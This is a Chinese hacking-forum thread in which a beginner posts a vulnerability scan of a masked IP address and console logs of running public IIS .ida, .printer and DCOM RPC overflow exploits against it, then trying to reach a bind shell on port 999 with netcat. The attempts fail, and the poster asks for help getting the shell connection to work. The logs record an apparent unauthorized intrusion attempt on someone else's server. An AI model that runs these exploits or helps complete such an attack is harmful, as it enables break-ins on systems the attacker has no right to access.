20CN网络安全小组论坛 - 菜鸟乐园 - 溢出问题，谁能回答我为什么，进来必须回帖！！

论坛: 菜鸟乐园标题: 溢出问题，谁能回答我为什么，进来必须回帖！！

作者: tianyecool [tianyecool]

论坛用户

发现 CGI漏洞: /scripts/samples/search/qsumrhit.htw
发现 CGI漏洞: /scripts/samples/search/qfullhit.htw
发现 CGI漏洞: /iissamples/exair/search/qsumrhit.htw
洞: /iissamples/exair/search/qfullhit.htw
发现 CGI漏洞: /null.idq
发现 CGI漏洞: /null.ida
发现 CGI漏洞: /abczxv.htw
发现 CGI漏洞: /default.asp%81
发现 CGI漏洞: /iissamples/issamples/query.asp
发现 CGI漏洞: /msadc/samples/selector/showcode.asp
CGI漏洞"扫描完成, 发现 12.

可能存在"IIS .asp映射分块编码远程缓冲区溢出"漏洞
IIS漏洞"扫描完成, 发现 1.

发现 DcomRpc溢出漏洞: 目前windows版本中危害最大的DcomRpc漏洞
Dcom Rpc scan complete.
DcomRpc溢出漏洞"扫描完成, 发现 1.

D:\工具\hack\tools\gongji>ida ***.**.**.** 80 0 999
index server 2 overflow. writen by sunx
    http://www.sunx.org
    for test only, dont used to hack, :p

connecting...
sending...
Now you can telnet to 999 port
good luck :)

D:\工具\hack\tools\gongji>nc -vv ***.**.**.** 999
***.**.**.**: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [***.**.**.**] 999 (?): connection refused
sent 0, rcvd 0: NOTSOCK

D:\工具\hack\tools\gongji>nc -vv ***.**.**.** 999
***.**.**.**: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [***.**.**.**] 999 (?): connection refused
sent 0, rcvd 0: NOTSOCK

D:\工具\hack\tools\gongji>nc -vv ***.**.**.** 999
***.**.**.**: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [***.**.**.**] 999 (?): connection refused
sent 0, rcvd 0: NOTSOCK

D:\工具\hack\tools\gongji>iishack ***.**.**.** 80 0 999
iis5 remote .printer overflow. writen by sunx
    http://www.sunx.org
    for test only, dont used to hack, :p

connecting...
sending...
Now you can telnet to 999 port
good luck :)

D:\工具\hack\tools\gongji>nc -vv ***.**.**.** 999
***.**.**.**: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [***.**.**.**] 999 (?): connection refused
sent 0, rcvd 0: NOTSOCK

D:\工具\hack\tools\gongji>cd dxcom
系统找不到指定的路径。

D:\工具\hack\tools\gongji>cd xdcom

D:\工具\hack\tools\gongji\xdcom>chdcom 1 ***.**.**.**
---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM last <hdm [at] metasploit.com>
- last by nic <nic [at] nic0x333@hotmail.com>
-Compiled and recorrected by pingker!
- Using return address of 0x77e22c29
- Exploit appeared to have failed.

D:\工具\hack\tools\gongji\xdcom>chdcom 1 ***.**.**.**
---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM last <hdm [at] metasploit.com>
- last by nic <nic [at] nic0x333@hotmail.com>
-Compiled and recorrected by pingker!
- Using return address of 0x77e22c29
- Exploit appeared to have failed.

D:\工具\hack\tools\gongji\xdcom>ping ***.**.**.**

Pinging ***.**.**.** with 32 bytes of data:

Reply from ***.**.**.**: bytes=32 time=217ms TTL=109
Reply from ***.**.**.**: bytes=32 time=217ms TTL=109
Reply from ***.**.**.**: bytes=32 time=219ms TTL=109
Reply from ***.**.**.**: bytes=32 time=220ms TTL=109

Ping statistics for ***.**.**.**:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 217ms, Maximum = 220ms, Average = 218ms

看到了吧，为什么他存在漏洞，我溢出成功，确连接失败呢？好象我的朋友都可以进去，我用的是XP系统~！

地主发表时间: 08/07 01:29

回复: tianyecool [tianyecool]

论坛用户

我很急啊，没人回答我吗？

B1层发表时间: 08/07 01:40